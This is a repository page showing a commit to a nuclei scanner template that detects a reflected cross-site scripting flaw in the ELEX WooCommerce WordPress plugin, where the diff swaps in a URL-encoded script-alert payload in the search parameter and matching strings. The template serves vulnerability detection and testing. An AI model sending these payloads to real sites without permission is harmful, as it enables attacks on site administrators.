daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update elex-woocommerce-xss.yaml

patch-1
Prince Chaddha 2022-02-22 13:50:29 +05:30 committed by GitHub
parent 9771206e69
commit bf0daa2650
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
vulnerabilities/wordpress/elex-woocommerce-xss.yaml
View File

@ -6,7 +6,7 @@ info:
severity: medium
description: The plugin does not sanitise or escape the search GET parameter before outputting back in the page, leading to a reflected Cross-Site Scripting issue, which will be executed in a logged in admin context.
reference: https://wpscan.com/vulnerability/647448d6-32c0-4b38-a40a-3b54c55f4e2e
tags: wordpress,wp-plugin,xss
tags: wordpress,wp-plugin,xss,wp,woocommerce
requests:
- raw:
@ -19,7 +19,7 @@ requests:
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=elex-product-feed-manage&search="><script>alert(/XSS/)</script> HTTP/1.1
GET /wp-admin/admin.php?page=elex-product-feed-manage&search=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
@ -28,7 +28,7 @@ requests:
- type: word
part: body
words:
- "<script>alert(/XSS/)</script>"
- "</script><script>alert(document.domain)</script>"
- type: word
part: header